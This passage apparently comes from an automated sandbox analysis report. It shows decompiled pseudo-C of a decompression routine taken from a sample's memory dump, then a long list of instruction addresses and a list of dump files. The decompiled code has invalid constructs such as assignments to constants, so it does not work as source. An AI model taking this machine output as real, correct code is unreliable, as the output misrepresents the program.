												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                0x00406d5a
                                                0x00406d5a
                                                0x00406d5a
                                                0x00406d5a
                                                0x00406d60
                                                0x00406d64
                                                0x00406d68
                                                0x00406d72
                                                0x00406d80
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x0040708d
                                                0x0040708d
                                                0x00407091
                                                0x00000000
                                                0x00000000
                                                0x00407093
                                                0x0040709c
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070ea
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708d
                                                0x00407091
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004070ec
                                                0x004070ec
                                                0x00407065
                                                0x00407069
                                                0x004071a1
                                                0x004071a1
                                                0x004071ab
                                                0x004071b3
                                                0x004071ba
                                                0x004071bc
                                                0x004071c3
                                                0x004071c7
                                                0x004071c7
                                                0x0040706f
                                                0x00407075
                                                0x0040707c
                                                0x00407084
                                                0x00407084
                                                0x00407087
                                                0x00000000
                                                0x00407087
                                                0x004070f1
                                                0x004070fe
                                                0x00407101
                                                0x0040700d
                                                0x0040700d
                                                0x0040700d
                                                0x004067a9
                                                0x004067a9
                                                0x004067a9
                                                0x004067b2
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x004067b8
                                                0x00000000
                                                0x004067bf
                                                0x004067c3
                                                0x00000000
                                                0x00000000
                                                0x004067c9
                                                0x004067cc
                                                0x004067cf
                                                0x004067d2
                                                0x004067d6
                                                0x00000000
                                                0x00000000
                                                0x004067dc
                                                0x004067dc
                                                0x004067df
                                                0x004067e1
                                                0x004067e2
                                                0x004067e5
                                                0x004067e7
                                                0x004067e8
                                                0x004067ea
                                                0x004067ed
                                                0x004067f2
                                                0x004067f7
                                                0x00406800
                                                0x00406813
                                                0x00406816
                                                0x00406822
                                                0x0040684a
                                                0x0040684c
                                                0x0040685a
                                                0x0040685a
                                                0x0040685e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040684e
                                                0x0040684e
                                                0x00406851
                                                0x00406852
                                                0x00406852
                                                0x00000000
                                                0x0040684e
                                                0x00406824
                                                0x00406828
                                                0x0040682d
                                                0x0040682d
                                                0x00406836
                                                0x0040683e
                                                0x00406841
                                                0x00000000
                                                0x00406847
                                                0x00406847
                                                0x00000000
                                                0x00406847
                                                0x00000000
                                                0x00406864
                                                0x00406864
                                                0x00406868
                                                0x00407114
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x0040686e
                                                0x00406871
                                                0x00406881
                                                0x00406884
                                                0x00406887
                                                0x00406887
                                                0x00406887
                                                0x0040688a
                                                0x0040688e
                                                0x00000000
                                                0x00000000
                                                0x00406890
                                                0x00406890
                                                0x00406896
                                                0x004068c0
                                                0x004068c6
                                                0x004068cd
                                                0x00000000
                                                0x004068cd
                                                0x00406898
                                                0x0040689c
                                                0x0040689f
                                                0x004068a4
                                                0x004068a4
                                                0x004068af
                                                0x004068b7
                                                0x004068ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068ff
                                                0x00406905
                                                0x00406908
                                                0x00406915
                                                0x0040691d
                                                0x00000000
                                                0x00000000
                                                0x004068d4
                                                0x004068d4
                                                0x004068d8
                                                0x00407123
                                                0x00407123
                                                0x00000000
                                                0x00407123
                                                0x004068de
                                                0x004068e4
                                                0x004068ef
                                                0x004068ef
                                                0x004068ef
                                                0x004068f2
                                                0x004068f5
                                                0x004068f8
                                                0x004068fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00407195
                                                0x00407195
                                                0x00000000
                                                0x00407195
                                                0x00406fec
                                                0x00406ff2
                                                0x00406ff9
                                                0x00407001
                                                0x00407004
                                                0x00407007
                                                0x00407007
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x00000000
                                                0x00406925
                                                0x00406925
                                                0x00406927
                                                0x0040692a
                                                0x0040699b
                                                0x0040699b
                                                0x0040699e
                                                0x004069a1
                                                0x004069a8
                                                0x004069b2
                                                0x00000000
                                                0x004069b2
                                                0x0040692c
                                                0x0040692c
                                                0x00406930
                                                0x00406933
                                                0x00406935
                                                0x00406938
                                                0x0040693b
                                                0x0040693d
                                                0x00406940
                                                0x00406942
                                                0x00406947
                                                0x0040694a
                                                0x0040694d
                                                0x00406951
                                                0x00406958
                                                0x0040695b
                                                0x00406962
                                                0x00406966
                                                0x0040696e
                                                0x0040696e
                                                0x0040696e
                                                0x00406968
                                                0x00406968
                                                0x00406968
                                                0x0040695d
                                                0x0040695d
                                                0x0040695d
                                                0x00406972
                                                0x00406975
                                                0x00406993
                                                0x00406993
                                                0x00406995
                                                0x00000000
                                                0x00406977
                                                0x00406977
                                                0x00406977
                                                0x0040697a
                                                0x0040697d
                                                0x00406980
                                                0x00406982
                                                0x00406982
                                                0x00406982
                                                0x00406985
                                                0x00406988
                                                0x0040698a
                                                0x0040698b
                                                0x0040698e
                                                0x00000000
                                                0x0040698e
                                                0x00000000
                                                0x00406bc4
                                                0x00406bc4
                                                0x00406bc8
                                                0x00406be6
                                                0x00406be6
                                                0x00406be9
                                                0x00406bf0
                                                0x00406bf3
                                                0x00406bf6
                                                0x00406bf9
                                                0x00406bfc
                                                0x00406bff
                                                0x00406c01
                                                0x00406c08
                                                0x00406c09
                                                0x00406c0b
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c14
                                                0x00406c19
                                                0x00000000
                                                0x00406c19
                                                0x00406bca
                                                0x00406bca
                                                0x00406bcd
                                                0x00406bd0
                                                0x00406bda
                                                0x00000000
                                                0x00000000
                                                0x00406c2e
                                                0x00406c2e
                                                0x00406c32
                                                0x00406c55
                                                0x00406c58
                                                0x00406c5b
                                                0x00406c65
                                                0x00406c34
                                                0x00406c34
                                                0x00406c37
                                                0x00406c3a
                                                0x00406c3d
                                                0x00406c4a
                                                0x00406c4d
                                                0x00406c4d
                                                0x00000000
                                                0x00000000
                                                0x00406c71
                                                0x00406c71
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c7b
                                                0x00406c7b
                                                0x00406c7f
                                                0x00000000
                                                0x00000000
                                                0x00406c85
                                                0x00406c85
                                                0x00406c87
                                                0x00406c8b
                                                0x00406c8b
                                                0x00406c8e
                                                0x00406c92
                                                0x00000000
                                                0x00000000
                                                0x00406ce2
                                                0x00406ce2
                                                0x00406ce6
                                                0x00406ced
                                                0x00406ced
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cfd
                                                0x00000000
                                                0x00406cfd
                                                0x00406ce8
                                                0x00406ce8
                                                0x00000000
                                                0x00000000
                                                0x00406d09
                                                0x00406d09
                                                0x00406d0d
                                                0x00406d14
                                                0x00406d17
                                                0x00406d1a
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d1d
                                                0x00406d20
                                                0x00406d23
                                                0x00406d23
                                                0x00406d26
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d2c
                                                0x00406d2f
                                                0x00406d36
                                                0x00406d3b
                                                0x00000000
                                                0x00000000
                                                0x00406dc9
                                                0x00406dc9
                                                0x00406dcd
                                                0x0040716b
                                                0x0040716b
                                                0x00000000
                                                0x0040716b
                                                0x00406dd3
                                                0x00406dd3
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddd
                                                0x00406de0
                                                0x00406de6
                                                0x00406de8
                                                0x00406de8
                                                0x00406de8
                                                0x00406deb
                                                0x00406dee
                                                0x00000000
                                                0x00000000
                                                0x004069be
                                                0x004069be
                                                0x004069c2
                                                0x0040712f
                                                0x0040712f
                                                0x00000000
                                                0x0040712f
                                                0x004069c8
                                                0x004069c8
                                                0x004069cb
                                                0x004069ce
                                                0x004069d2
                                                0x004069d5
                                                0x004069db
                                                0x004069dd
                                                0x004069dd
                                                0x004069dd
                                                0x004069e0
                                                0x004069e3
                                                0x004069e3
                                                0x004069e6
                                                0x004069e9
                                                0x00000000
                                                0x00000000
                                                0x004069ef
                                                0x004069ef
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x004069fb
                                                0x004069fb
                                                0x004069ff
                                                0x00406a02
                                                0x00406a05
                                                0x00406a08
                                                0x00406a0b
                                                0x00406a0c
                                                0x00406a0f
                                                0x00406a11
                                                0x00406a17
                                                0x00406a1a
                                                0x00406a1d
                                                0x00406a20
                                                0x00406a23
                                                0x00406a26
                                                0x00406a29
                                                0x00406a45
                                                0x00406a48
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a55
                                                0x00406a59
                                                0x00406a5b
                                                0x00406a5f
                                                0x00406a2b
                                                0x00406a2b
                                                0x00406a2f
                                                0x00406a37
                                                0x00406a3c
                                                0x00406a3e
                                                0x00406a40
                                                0x00406a40
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6c
                                                0x00000000
                                                0x00406a72
                                                0x00406a72
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a77
                                                0x00406a77
                                                0x00406a7b
                                                0x0040713b
                                                0x0040713b
                                                0x00000000
                                                0x0040713b
                                                0x00406a81
                                                0x00406a81
                                                0x00406a84
                                                0x00406a87
                                                0x00406a8b
                                                0x00406a8e
                                                0x00406a94
                                                0x00406a96
                                                0x00406a96
                                                0x00406a96
                                                0x00406a99
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406aa2
                                                0x00000000
                                                0x00000000
                                                0x00406aa4
                                                0x00406aa4
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406aad
                                                0x00406ab0
                                                0x00406ab3
                                                0x00406ab6
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac2
                                                0x00406ada
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406aea
                                                0x00406aec
                                                0x00406ac4
                                                0x00406ac4
                                                0x00406acc
                                                0x00406ad1
                                                0x00406ad3
                                                0x00406ad5
                                                0x00406ad5
                                                0x00406aef
                                                0x00406af6
                                                0x00406af9
                                                0x00000000
                                                0x00406afb
                                                0x00406afb
                                                0x00000000
                                                0x00406afb
                                                0x00406af9
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00000000
                                                0x00000000
                                                0x00406b3b
                                                0x00406b3b
                                                0x00406b3f
                                                0x00407147
                                                0x00407147
                                                0x00000000
                                                0x00407147
                                                0x00406b45
                                                0x00406b45
                                                0x00406b48
                                                0x00406b4b
                                                0x00406b4f
                                                0x00406b52
                                                0x00406b58
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b66
                                                0x00406b04
                                                0x00406b04
                                                0x00406b07
                                                0x00000000
                                                0x00406b07
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6b
                                                0x00406b6e
                                                0x00406b71
                                                0x00406b74
                                                0x00406b77
                                                0x00406b7a
                                                0x00406b7d
                                                0x00406b80
                                                0x00406b83
                                                0x00406b86
                                                0x00406b9e
                                                0x00406ba1
                                                0x00406ba4
                                                0x00406ba7
                                                0x00406ba7
                                                0x00406baa
                                                0x00406bae
                                                0x00406bb0
                                                0x00406b88
                                                0x00406b88
                                                0x00406b90
                                                0x00406b95
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406bb3
                                                0x00406bba
                                                0x00406bbd
                                                0x00000000
                                                0x00406bbf
                                                0x00406bbf
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e50
                                                0x00407177
                                                0x00407177
                                                0x00000000
                                                0x00407177
                                                0x00406e56
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e60
                                                0x00406e63
                                                0x00406e69
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6e
                                                0x00000000
                                                0x00000000
                                                0x00406c1c
                                                0x00406c1c
                                                0x00406c1f
                                                0x00000000
                                                0x00000000
                                                0x00406f5b
                                                0x00406f5b
                                                0x00406f5f
                                                0x00406f81
                                                0x00406f81
                                                0x00406f84
                                                0x00406f8e
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f61
                                                0x00406f61
                                                0x00406f64
                                                0x00406f68
                                                0x00406f6b
                                                0x00406f6b
                                                0x00406f6e
                                                0x00000000
                                                0x00000000
                                                0x00407018
                                                0x00407018
                                                0x0040701c
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x00407041
                                                0x00407048
                                                0x0040704f
                                                0x0040704f
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x00000000
                                                0x00407063
                                                0x0040701e
                                                0x0040701e
                                                0x00407021
                                                0x00407024
                                                0x00407027
                                                0x0040702e
                                                0x00406f72
                                                0x00406f72
                                                0x00406f75
                                                0x00000000
                                                0x00000000
                                                0x00407109
                                                0x00407109
                                                0x0040710c
                                                0x0040700d
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x00407013
                                                0x00000000
                                                0x00406d43
                                                0x00406d43
                                                0x00406d45
                                                0x00406d4c
                                                0x00406d4d
                                                0x00406d4f
                                                0x00406d52
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x00000000
                                                0x00407063
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406d88
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e21
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00406b0a
                                                0x00406b0a
                                                0x00406b0e
                                                0x00407153
                                                0x00407153
                                                0x00000000
                                                0x00407153
                                                0x00406b14
                                                0x00406b14
                                                0x00406b17
                                                0x00406b1a
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b2e
                                                0x00406b31
                                                0x00406b33
                                                0x00406b33
                                                0x00406b33
                                                0x00000000
                                                0x00000000
                                                0x00406c95
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x0040715f
                                                0x00000000
                                                0x0040715f
                                                0x00406c9f
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00406cd0
                                                0x00406cd0
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00406f56
                                                0x00406cd3
                                                0x00406cd3
                                                0x00000000
                                                0x00406cd3
                                                0x00406f54
                                                0x00407189
                                                0x00407189
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x004071c0
                                                0x004071c0
                                                0x00000000
                                                0x004071c0
                                                0x0040700d
                                                0x0040708d
                                                0x00407056

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
